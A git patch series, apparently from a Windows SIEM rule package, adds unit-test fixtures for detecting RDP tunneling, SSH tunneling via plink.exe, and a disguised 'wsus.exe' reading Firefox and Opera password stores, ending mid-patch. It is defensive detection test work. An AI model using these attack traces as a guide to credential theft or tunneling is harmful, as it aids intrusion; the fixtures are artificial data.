From f98b3d9c39c6af329b9b8291d2b30af6a1c8bc09 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 10:57:52 +0300 Subject: [PATCH 01/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(RDP=5FTu?= =?UTF-8?q?nneling)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_1.sc | 3 +++ .../mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_2.sc | 3 +++ 2 files changed, 6 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_1.sc new file mode 100644 index 00000000..8709709a --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_1.sc 
@@ -0,0 +1,3 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-02-13T15:26:53.3567809Z\"},\"EventRecordID\":\"5315\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"480\",\"ThreadID\":\"3952\"},\"Channel\":\"Security\",\"Computer\":\"PC02.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"PC02$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"EXAMPLE\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"TargetUserName\",\"text\":\"IEUser\"},{\"Name\":\"TargetDomainName\",\"text\":\"PC02\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x45120\"},{\"Name\":\"LogonType\",\"text\":\"10\"},{\"Name\":\"LogonProcessName\",\"text\":\"User32\"},{\"Name\":\"AuthenticationPackageName\",\"text\":\"Negotiate\"},{\"Name\":\"WorkstationName\",\"text\":\"PC02\"},{\"Name\":\"LogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TransmittedServices\",\"text\":\"-\"},{\"Name\":\"LmPackageName\",\"text\":\"-\"},{\"Name\":\"KeyLength\",\"text\":\"0\"},{\"Name\":\"ProcessId\",\"text\":\"0x658\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"},{\"Name\":\"IpAddress\",\"text\":\"127.0.0.1\"},{\"Name\":\"IpPort\",\"text\":\"49164\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield6": "RemoteInteractive", "datafield9": "Negotiate", "dst.fqdn": "pc02.example.corp", "dst.host": "pc02.example.corp", "dst.hostname": 
"pc02", "event_src.category": "AAA", "event_src.fqdn": "pc02.example.corp", "event_src.host": "pc02.example.corp", "event_src.hostname": "pc02", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "User32", "logon_type": 10, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "system", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T21:05:50.597Z", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 49164, "status": "success", "subject": "account", "subject.account.domain": "pc02", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.session_id": "282912", "subject.process.fullpath": "c:\\windows\\system32\\winlogon.exe", "subject.process.id": "1624", "subject.process.name": "winlogon.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-02-13T15:26:53.356Z", "type": "raw", "uuid": "8a33a9cc-4609-43b5-aa3f-4d468a296ce2"} + +expect 1 {"action": "login", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Protocol Tunneling", "correlation_name": "RDP_Tunneling", "correlation_type": "incident", "dst.fqdn": "pc02.example.corp", "dst.host": "pc02.example.corp", "dst.hostname": "pc02", "event_src.category": "AAA", "event_src.host": "pc02.example.corp", "event_src.hostname": "pc02", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.category": "Undefined", "incident.severity": "medium", "logon_auth_method": 
"remote", "logon_service": "User32", "logon_type": 10, "object": "system", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 49164, "status": "success", "subject": "account", "subject.account.domain": "pc02", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.session_id": "282912", "subject.process.fullpath": "c:\\windows\\system32\\winlogon.exe", "subject.process.id": "1624", "subject.process.name": "winlogon.exe", "subject.process.path": "c:\\windows\\system32\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_2.sc new file mode 100644 index 00000000..d5592e37 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_2.sc 
@@ -0,0 +1,3 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-TerminalServices-RemoteConnectionManager\",\"Guid\":\"{c76baa63-ae81-421c-b425-340b4b24157f}\"},\"EventID\":\"1149\",\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"0\",\"Opcode\":\"0\",\"Keywords\":\"0x1000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-02-13T18:04:57.4523864Z\"},\"EventRecordID\":\"228\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1280\",\"ThreadID\":\"2748\"},\"Channel\":\"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational\",\"Computer\":\"PC01.example.corp\",\"Security\":{\"UserID\":\"S-1-5-20\"}},\"UserData\":{\"EventXML\":{\"xmlns:auto-ns2\":\"2>http://schemas.microsoft.com/win/2004/08/events\",\"xmlns\":\"Event_NS\",\"Param1\":\"admin01\",\"Param2\":\"example\",\"Param3\":\"127.0.0.1\"}}}}", "category.generic": "Access", "category.high": "Authentication", "category.low": "Remote", "event_src.category": "Terminal services", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "1149_User_authentication_succeeded", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1149", "normalized": true, "object": "system", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T21:55:11.504Z", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.name": "admin01", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-02-13T18:04:57.452Z", 
"type": "raw", "uuid": "8b82ace1-015d-45a5-8be0-552b37fceb60"} + +expect 1 {"action": "login", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Protocol Tunneling", "correlation_name": "RDP_Tunneling", "correlation_type": "incident", "event_src.category": "Terminal services", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.category": "Undefined", "incident.severity": "medium", "object": "system", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.name": "admin01"} \ No newline at end of file From a52fe44b75da2475d67737f0c1b1f0479e6a6a03 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 11:13:50 +0300 Subject: [PATCH 02/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(RDP=5FTu?= =?UTF-8?q?nneling=5Fvia=5FSSH=5F5156)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../RDP_Tunneling_via_SSH_5156/tests/test_1.sc | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling_via_SSH_5156/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling_via_SSH_5156/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling_via_SSH_5156/tests/test_1.sc new file mode 100644 index 00000000..1eeceb36 --- /dev/null 
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling_via_SSH_5156/tests/test_1.sc 
@@ -0,0 +1,3 @@ +{"action": "allow", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5156\",\"Version\":\"1\",\"Level\":\"0\",\"Task\":\"12810\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-02-13T18:04:01.6321208Z\"},\"EventRecordID\":\"227727\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"PC01.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"ProcessID\",\"text\":\"3324\"},{\"Name\":\"Application\",\"text\":\"\\\\device\\\\harddiskvolume1\\\\users\\\\user01\\\\desktop\\\\plink.exe\"},{\"Name\":\"Direction\",\"text\":\"%%14593\"},{\"Name\":\"SourceAddress\",\"text\":\"127.0.0.1\"},{\"Name\":\"SourcePort\",\"text\":\"49271\"},{\"Name\":\"DestAddress\",\"text\":\"127.0.0.2\"},{\"Name\":\"DestPort\",\"text\":\"3389\"},{\"Name\":\"Protocol\",\"text\":\"6\"},{\"Name\":\"FilterRTID\",\"text\":\"0\"},{\"Name\":\"LayerName\",\"text\":\"%%14611\"},{\"Name\":\"LayerRTID\",\"text\":\"48\"},{\"Name\":\"RemoteUserID\",\"text\":\"S-1-0-0\"},{\"Name\":\"RemoteMachineID\",\"text\":\"S-1-0-0\"}]}}}", "category.generic": "Connection", "category.high": "Network Interaction Management", "category.low": "Control", "datafield5": "48", "direction": "egress", "dst.host": "127.0.0.2", "dst.ip": "127.0.0.2", "dst.port": 3389, "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5156_WFP_has_permitted_connection", "importance": "info", "input_id": 
"00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5156", "normalized": true, "object": "connection", "object.process.fullpath": "\\device\\harddiskvolume1\\users\\user01\\desktop\\plink.exe", "object.process.id": "3324", "object.process.name": "plink.exe", "object.process.path": "\\device\\harddiskvolume1\\users\\user01\\desktop\\", "object.property": "ALE layer", "object.value": "Connect", "protocol": "6", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T21:30:19.331Z", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 49271, "status": "success", "subject": "rule", "subject.id": "0", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-02-13T18:04:01.632Z", "type": "raw", "uuid": "dc4c60bd-251a-4238-94bb-1d308a36fb43"} + +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Protocol Tunneling", "correlation_name": "RDP_Tunneling_via_SSH_5156", "correlation_type": "event", "direction": "egress", "dst.host": "127.0.0.2", "dst.ip": "127.0.0.2", "dst.port": 3389, "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "object": "process", "object.process.fullpath": "\\device\\harddiskvolume1\\users\\user01\\desktop\\plink.exe", "object.process.id": "3324", "object.process.name": "plink.exe", "object.process.path": "\\device\\harddiskvolume1\\users\\user01\\desktop\\", "protocol": "6", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 49271, "status": "success", "subject": "account"} From 1533d6406ddda2a6b239112acdf9bbc3355fbeeb Mon Sep 17 00:00:00 2001 
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 13:27:04 +0300 Subject: [PATCH 03/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Chrome?= =?UTF-8?q?=5Ffirefox=5Fopera=5Fcred=5Fread)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Chrome_firefox_opera_cred_read/tests/test_1.sc | 4 ++++ .../Chrome_firefox_opera_cred_read/tests/test_2.sc | 4 ++++ .../Chrome_firefox_opera_cred_read/tests/test_3.sc | 4 ++++ .../Chrome_firefox_opera_cred_read/tests/test_4.sc | 6 ++++++ 4 files changed, 18 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_3.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_1.sc new file mode 100644 index 00000000..5ebb4973 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_1.sc 
@@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:05.3081880Z\"},\"EventRecordID\":\"4989\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\kushu3sd.default\\\\key4.db\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", 
"mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\key4.db", "object.name": "key4.db", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T11:47:59.229Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:05.308Z", "type": "raw", "uuid": "ab468aaa-cc07-45a7-b407-d7cd53928174"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:18.6997552Z\"},\"EventRecordID\":\"4990\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\kushu3sd.default\\\\logins.json\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": 
"4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\logins.json", "object.name": "logins.json", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T11:47:59.230Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:18.699Z", "type": "raw", "uuid": "1594673e-8a1f-41aa-81af-dd9dc3f73331"} + +expect 2 {"action": "read", "alert.key": "C:\\Users\\Defau1t\\wsus.exe", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores", "correlation_name": "Chrome_firefox_opera_cred_read", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "object": "file", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": 
"%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_2.sc new file mode 100644 index 00000000..03f4760f --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_2.sc 
@@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:31:15.3550630Z\"},\"EventRecordID\":\"4988\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"68\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Opera Software\\\\Opera Stable\\\\Login Data\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": 
"application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:25:48.782Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:31:15.355Z", "type": "raw", "uuid": "1195b590-34e4-4b68-9ab5-225793f7be13"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "read", "alert.context": "iewin7\\ieuser read 'c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\login data' on iewin7", "alert.key": "C:\\Users\\Defau1t\\wsus.exe", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores", "correlation_name": "Chrome_firefox_opera_cred_read", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "object": "file", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\"} \ No newline at end of file diff --git 